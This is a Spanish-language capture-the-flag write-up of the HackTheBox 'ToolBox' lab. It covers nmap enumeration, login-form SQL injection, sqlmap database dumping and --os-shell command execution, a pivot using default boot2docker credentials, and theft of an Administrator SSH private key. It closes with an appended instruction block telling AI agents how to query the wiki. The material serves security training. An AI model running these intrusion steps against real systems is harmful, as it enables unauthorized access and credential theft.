# ToolBox
Toolbox es una máquina de dificultad fácil que podemos encontrar en la plataforma de HackTheBox. Es una instancia de Windows que ejecuta un Docker Toolbox. Antes de que Windows pudiera admitir contenedores, esto usaba VirtualBox para ejecutar un sistema operativo Linux personalizado y liviano optimizado para ejecutar Docker. Obtendré una retención mediante inyección de SQL que se convierte en RCE con SQLMap. Luego, usaré las credenciales predeterminadas para pasar a la VM, donde encuentro una clave SSH que otorga acceso de administrador al sistema Host.
### Enumeración
#### NMAP
Comenzamos realizando un escaneo rápido de los puertos que tiene abiertos la máquina víctima.
```
nmap -p- --open -vvv -Pn -n --min-rate 2000 10.10.10.236
```
Tenemos 14 puertos abiertos en el Host víctima. Vamos a realizar un escaneo más profundo para determinar versiones de los servicios disponibles.
```
nmap -p21,22,135,139,443,445,5985,47001,49664,49665,49666,49667,49668,49669 -sVC -vv 10.10.11.130
```
Después de finalizar el escaneo con NMAP, vemos que tenemos los servicios FTP, SSH, RPC NetBIOS, HTTPS y SMB disponibles. También, que el inicio de sesión en el servicio FTP es anónimo.
#### Enumeración FTP
Anteriormente, vimos que podemos iniciar sesión en el servidor FTP de manera anónima. Vamos a iniciar sesión y ver si hay información que nos pueda ser de utilidad.
```
ftp -p 10.10.10.236
```
Podemos ver un binario llamado "docker-toolbox.exe". Esto nos puede dar una idea de que el sistema está basado en Docker. De momento, no podemos hacer mucho más con la información encontrada.
#### Enumeración web
Al realizar el escaneo de servicios, vimos el nombre de un dominio. Vamos a registrarlo en nuestro archivo /etc/hosts.
```
echo "10.10.10.236 admin.megalogistic.com" >> /etc/hosts
```
Ahora vamos a ver su contenido en el navegador web.
### Shell como usuario Postgres en Docker
#### Identificando vulnerabilidad
Tenemos un formulario de inicio de sesión. Vamos a comprobar si es vulnerable a inyecciones SQL. Para ello, realizamos la inyección de varios paylaods para comprobar si da error.
Después de realizar la inyección de varios payloads, el siguiente provoca un error y nos permite iniciar sesión como admin.
```
admin'-- -
```
Después de examinar todos los posibles accesos y puntos que pudiesen ser vulnerables, no encotramos nada que nos pueda ser útil. El siguiente paso será enumerar la BBDD y probar si podemos realizar inyección de comandos aprovechando la vulnerabilidad SQLi.
#### Enumerar BBDD
Un formulario de inicio de sesión no muestra datos de la base de datos en la página, por lo que es un Blind SQL. Guardaré una solicitud POST capturando la petición del formulario con Burp.
Ejecutaré `-r login.txt` para darle el archivo desde el que trabajar `--force-ssl`(ya que es un sitio con certificado HTTPS) y `--batch`para aceptar los valores predeterminados en las indicaciones. Con el comando `--dbs` enumeraremos las bases de datos disponibles.
Petición captura del formulario de inicio de sesión
Ahora con el archivo login.txt creado, utilizamos SQLMap para enumerar la base de datos.
```
sqlmap -r login.txt --force-ssl --batch --dbs
```
De las tres bases de datos disponibles, la que parece más interesante es "public". A continuación, vamos a enumerar las tablas de esta base de datos.
```
sqlmap -r login.txt --force-ssl --batch -D public --tables
```
Finalmente, vamos a volcar el contenido de la tabla "users".
```
sqlmap -r login.txt --force-ssl --batch -D public -T users --dump
```
Obtenemos el hash de contraseña para el usuario admin, pero no podemos descifrarlo utilizando diversas herramientas. Tenemos que probar otra forma de acceso a la máquina objetivo. Vamos a utilizar los parámetros --os-cmd y --os-shell para intentar conectar con la máquina víctima aprovechando la vuln SQLi.
```
sqlmap -r login.txt --force-ssl --batch --os-cmd whoami
sqlmap -r login.txt --force-ssl --batch --os-cmd id
sqlmap -r login.txt --force-ssl --batch --os-shell
```
Y podemos conectarnos a la máquina víctima mediante shell.
Y buscamos la flag user.txt
### Elevación de privilegios
#### Shell como Docker en VM
Con el comando ifconfig podemos ver que no estamos en la máquina Host. La IP 172.17.0.2 indica que estamos en un Docker y que el Host es 172.17.0.1.
Recordemos que el Host principal es un SO Windows pero Docker no se puede instalar directamente sobre SO Windows. También, vamos a recordar el binario que encontramos en el servidor FTP "docker-toolbox.exe".
Detalles que debemos conocer sobre Docker-Toolbox. Docker Toolbox instala VirtualBox y crea una máquina virtual que ejecuta la distribución de Linux boot2docker. Boot2Docker es una distribución ligera de Linux creada específicamente para ejecutar contenedores Docker en distribuciones Windows y Mac OS.
Esta distribución tiene unas credenciales por defecto que son usuario docker y la contraseña tcuser.
Intentaremos saltar mediante SSH desde la terminal "postgres"
```
ssh docker@172.17.0.1
```
\*Hay que inicar una terminal interactiva ('script /dev/null -c bash')
Ya somos usuarios Docker. Vamos a comprobar los privilegios de este usuario.
```
sudo -l
```
Este usuario puede utilizar sudo sin contraseña.
#### ROOT
Enumeramos los directorios disponibles para el usuario Docker.
Entre todos los directorios encontrados, hay uno cuyo nombre no es común, "c". Vamos a ver su contenido.
Dentro del directorio "c" hay otro llamado "Users". Dentro de este directorio hay un subdirectorio llamado "Administrator", que contiene varias carpetas entre ellas, ".ssh".
Vamos a ver el contenido de .ssh.
Dentro de este directorio tenemos unas claves "id\_rsa". Vamos a copiar la clave privada a nuestra máquina para intentar la conexión a la máquina víctima como usuario Administrator mediante SSH.
Y le damos privilegios para poder utilizarla en conexiones SSH.
```
chmod 600 id_rsa
```
Intentamos la conexión SSH con la clave "id\_rsa" encontrada desde nuestra terminal.
```
ssh administrator@10.10.10.236 -i id_rsa
```
Ya estamos conectados a la máquina víctima como usuario Administrator. Solo queda buscar la flag root.txt.
Y ya estaría acabada la máquina ToolBox.
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://wiki.securiters.com/securiters-wiki/write-ups/hack-the-box/toolbox.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.